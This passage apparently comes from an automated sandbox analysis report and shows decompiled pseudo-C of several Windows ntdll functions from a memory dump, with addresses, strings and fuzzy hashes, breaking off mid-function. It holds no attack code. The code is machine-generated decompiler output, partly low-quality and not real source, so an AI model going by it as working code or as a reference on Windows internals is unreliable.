				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E013B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01329730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E013AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E013AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E013B1293(_t79, _v40, E013B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01307D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E013A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                            0x013b05c5
                            0x013b05ca
                            0x013b05d3
                            0x013b06db
                            0x013b06db
                            0x013b06dd
                            0x013b06e3
                            0x013b06e3
                            0x013b05dd
                            0x013b05e7
                            0x013b05f6
                            0x013b0600
                            0x013b0607
                            0x013b0610
                            0x013b0615
                            0x013b061a
                            0x013b061c
                            0x013b061e
                            0x013b0624
                            0x013b0625
                            0x013b0627
                            0x013b0628
                            0x013b0631
                            0x013b0640
                            0x013b064d
                            0x013b0654
                            0x013b0654
                            0x013b0631
                            0x013b066d
                            0x013b0674
                            0x00000000
                            0x00000000
                            0x013b0692
                            0x013b069e
                            0x013b06b0
                            0x013b06a0
                            0x013b06a9
                            0x013b06a9
                            0x013b06b8
                            0x013b06d6
                            0x013b06d6
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: `
                            • API String ID: 0-2679148245
                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                            • Instruction ID: b3031a955f24ddac1e1c91c9df9918f0309a1e6abc8640db0ebbf3468753da03
                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                            • Instruction Fuzzy Hash: 5631F3326003066BE714DE28CC85F9B7BE9EBC4768F144229FB54ABA80E670E904C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01363884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E01363884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01329650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01304620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01329650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                            0x01363893
                            0x01363896
                            0x01363899
                            0x0136389f
                            0x013638a0
                            0x013638a4
                            0x013638a9
                            0x013638ac
                            0x013638ad
                            0x013638ae
                            0x013638af
                            0x013638b1
                            0x013638b4
                            0x013638bb
                            0x013638bc
                            0x013638bd
                            0x013638c4
                            0x013638c8
                            0x013638ca
                            0x013638ca
                            0x013638d5
                            0x0136393e
                            0x01363940
                            0x01363942
                            0x01363952
                            0x01363954
                            0x01363961
                            0x01363961
                            0x01363967
                            0x0136396e
                            0x0136396e
                            0x01363947
                            0x0136394c
                            0x00000000
                            0x0136394c
                            0x013638ea
                            0x013638ee
                            0x013638f8
                            0x013638f9
                            0x013638ff
                            0x01363900
                            0x01363902
                            0x01363903
                            0x0136390b
                            0x0136390f
                            0x01363950
                            0x00000000
                            0x01363950
                            0x01363915
                            0x0136391d
                            0x0136391d
                            0x01363922
                            0x01363926
                            0x00000000
                            0x01363928
                            0x0136392b
                            0x0136392b
                            0x01363935
                            0x01363937
                            0x01363937
                            0x00000000
                            0x01363935
                            0x01363926
                            0x013638f0
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: BinaryName
                            • API String ID: 0-215506332
                            • Opcode ID: 3f33bf9cb56eae20e633d53ff1c0ade6c1889e0b8edce10e49e3702cf33b99e5
                            • Instruction ID: aeb94d5505e5aca214224ec7825bb2e3af7d1ba1ae39c3e1e0890c575d067e1c
                            • Opcode Fuzzy Hash: 3f33bf9cb56eae20e633d53ff1c0ade6c1889e0b8edce10e49e3702cf33b99e5
                            • Instruction Fuzzy Hash: D331E532D0051AAFEB15DA5CC945F7BBBF8FF51B28F018169E918A7295D7309E04CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            C-Code - Quality: 33%
                            			E0131D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01304120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0132B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E013298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E013295D0();
					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                            0x0131d29c
                            0x0131d2a6
                            0x0131d2b1
                            0x0131d2b5
                            0x0131d2b6
                            0x0131d2bc
                            0x0131d2bd
                            0x0131d2be
                            0x0131d2bf
                            0x0131d2c2
                            0x0131d2c4
                            0x0131d2cc
                            0x0131d384
                            0x0131d34b
                            0x0131d34f
                            0x0131d350
                            0x0131d351
                            0x0131d35c
                            0x0131d35c
                            0x0131d2d6
                            0x0131d2da
                            0x0131d2e1
                            0x0131d361
                            0x0131d369
                            0x0131d36d
                            0x0131d2e3
                            0x0131d2e3
                            0x0131d2e3
                            0x0131d2e5
                            0x0131d2ed
                            0x0131d2f5
                            0x0131d2fa
                            0x0131d302
                            0x0131d303
                            0x0131d30b
                            0x0131d30f
                            0x0131d313
                            0x0131d318
                            0x0131d31c
                            0x0131d320
                            0x0131d379
                            0x0131d37d
                            0x00000000
                            0x00000000
                            0x0135affe
                            0x0135b001
                            0x0135b011
                            0x00000000
                            0x0131d322
                            0x0131d322
                            0x0131d330
                            0x0131d337
                            0x0131d35d
                            0x0131d339
                            0x0131d33f
                            0x0131d38c
                            0x0131d38c
                            0x0131d33f
                            0x0131d349
                            0x00000000
                            0x0131d349

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 7d668f609af5f201680f209e34a999fdd81131bbd274c9789ee997f1481cb991
                            • Instruction ID: cefd9f6ed68a968d738352526a29ae6ba362325da7af43a7b568d4774ee681f3
                            • Opcode Fuzzy Hash: 7d668f609af5f201680f209e34a999fdd81131bbd274c9789ee997f1481cb991
                            • Instruction Fuzzy Hash: C431A2B15083059FC325DF6CC984A6BBBE8EB9A758F000A2EF99483650D734DD05CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012F1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E012F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0132BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0132A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0132A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01304620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                            0x012f1b8f
                            0x012f1b9a
                            0x012f1b9c
                            0x012f1b9e
                            0x012f1ba3
                            0x01347010
                            0x01347010
                            0x00000000
                            0x012f1ba9
                            0x012f1ba9
                            0x012f1bae
                            0x00000000
                            0x012f1bc5
                            0x012f1bca
                            0x012f1bcf
                            0x012f1bd0
                            0x012f1bd1
                            0x012f1bd2
                            0x012f1bd6
                            0x012f1bdc
                            0x012f1be0
                            0x01346ffc
                            0x01347000
                            0x00000000
                            0x01347006
                            0x01347009
                            0x01347009
                            0x012f1be6
                            0x012f1bec
                            0x012f1c0b
                            0x012f1c0b
                            0x012f1c0c
                            0x012f1c11
                            0x012f1c12
                            0x012f1c15
                            0x012f1c1b
                            0x012f1c1f
                            0x012f1c31
                            0x012f1c33
                            0x01347026
                            0x01347026
                            0x012f1c21
                            0x012f1c24
                            0x012f1c24
                            0x012f1bee
                            0x012f1bee
                            0x012f1bf2
                            0x012f1c3a
                            0x012f1bf4
                            0x012f1bf4
                            0x012f1c05
                            0x012f1c05
                            0x012f1c09
                            0x012f1c3e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012f1c09
                            0x012f1bec
                            0x012f1be0
                            0x012f1bae
                            0x012f1c2e

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: WindowsExcludedProcs
                            • API String ID: 0-3583428290
                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction ID: b7fdeeb965e89ead08a8c891c61a05dd03306ef43fe32cf2ea713aae32d72ca4
                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                            • Instruction Fuzzy Hash: A621C27A611229EBDB229A5DC840F6BFBADEF41A54F454439FB049B200D631ED1097A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0130F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0130F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                            0x0130f71d
                            0x0130f722
                            0x0130f726
                            0x01354770
                            0x0130f765
                            0x0130f769
                            0x0130f769
                            0x0130f732
                            0x0135477a
                            0x00000000
                            0x0135477a
                            0x0130f738
                            0x0130f73a
                            0x0130f73c
                            0x0130f73f
                            0x0130f746
                            0x0130f778
                            0x0130f7a9
                            0x0130f7a9
                            0x0130f754
                            0x0130f75a
                            0x0130f75d
                            0x0130f75f
                            0x0130f761
                            0x0130f76f
                            0x0130f771
                            0x0130f771
                            0x0130f76f
                            0x0130f763
                            0x00000000
                            0x0130f763
                            0x0130f77d
                            0x0130f7a3
                            0x0130f7a5
                            0x00000000
                            0x0130f7a5
                            0x0130f77f
                            0x0130f782
                            0x0130f784
                            0x0130f786
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0130f788
                            0x0130f748
                            0x0130f74d
                            0x0130f78d
                            0x0130f793
                            0x0130f7b7
                            0x0130f7bc
                            0x00000000
                            0x0130f7bc
                            0x0130f798
                            0x00000000
                            0x00000000
                            0x0130f79d
                            0x0130f7b0
                            0x00000000
                            0x0130f7b0
                            0x0130f79f
                            0x00000000
                            0x0130f74f
                            0x0130f74f
                            0x00000000
                            0x0130f74f

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Actx
                            • API String ID: 0-89312691
                            • Opcode ID: 2805d3395fa35ae2ecce237e0779e16b9d510a6d8130ae0a3fc8895961cebf23
                            • Instruction ID: 15d95a9770fd33671ab27f5731434a4303aa6dde47e337c47e9b6d12d439f0d5
                            • Opcode Fuzzy Hash: 2805d3395fa35ae2ecce237e0779e16b9d510a6d8130ae0a3fc8895961cebf23
                            • Instruction Fuzzy Hash: 0A1193353046068BE73B8E1D85B073676DDAB95EECF24452AE561CB7D1D7B0C8418343
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01398DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E01398DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x13c0d50);
				E0133D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01375720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0133DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0133DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0133D130(_t34, _t39, _t40);
			}





                            0x01398df1
                            0x01398df1
                            0x01398df1
                            0x01398df1
                            0x01398df1
                            0x01398df1
                            0x01398df3
                            0x01398df8
                            0x01398dfd
                            0x01398e00
                            0x01398e0e
                            0x01398e2a
                            0x01398e36
                            0x01398e38
                            0x01398e3c
                            0x01398e46
                            0x01398e46
                            0x01398e36
                            0x01398e50
                            0x01398e56
                            0x01398e59
                            0x01398e5c
                            0x01398e60
                            0x01398e67
                            0x01398e6d
                            0x01398e73
                            0x01398e74
                            0x01398eb1
                            0x01398ebd

                            Strings
                            • Critical error detected %lx, xrefs: 01398E21
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Critical error detected %lx
                            • API String ID: 0-802127002
                            • Opcode ID: 74c6397e24db219ee792cb0cea6e3533c7fb6d22215c90c81d42b80769e1be76
                            • Instruction ID: 7a4bea6a3d6234ed28ba4643e5e8c1057e733d7ca4e18db3e310f2d7e021eaa1
                            • Opcode Fuzzy Hash: 74c6397e24db219ee792cb0cea6e3533c7fb6d22215c90c81d42b80769e1be76
                            • Instruction Fuzzy Hash: 3F1187B5D1034CDBDF28CFB8850579CBBB4BB45319F20429EE129AB282C3340602CF18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0137FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                            Download Yara Rule
                            Strings
                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0137FF60
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                            • API String ID: 0-1911121157
                            • Opcode ID: af8d0364adc1ea03c388e43001054c94f60ec14c00edd7ae72ed8ca160d9f429
                            • Instruction ID: 045575578350c66082b2094665dbdfcc989534212a31bb73bdbdd57b589244bd
                            • Opcode Fuzzy Hash: af8d0364adc1ea03c388e43001054c94f60ec14c00edd7ae72ed8ca160d9f429
                            • Instruction Fuzzy Hash: 6C110471910544EFDB26DF58C948F98BBB1FF0471CF548058E10457261CB3D9954CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013B5BA5, Relevance: .6, Instructions: 592COMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E013B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x13c1178);
				E0133D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E013B4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0132D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E013B5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13d60e8;
								if( *0x13d60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13d60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01329710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
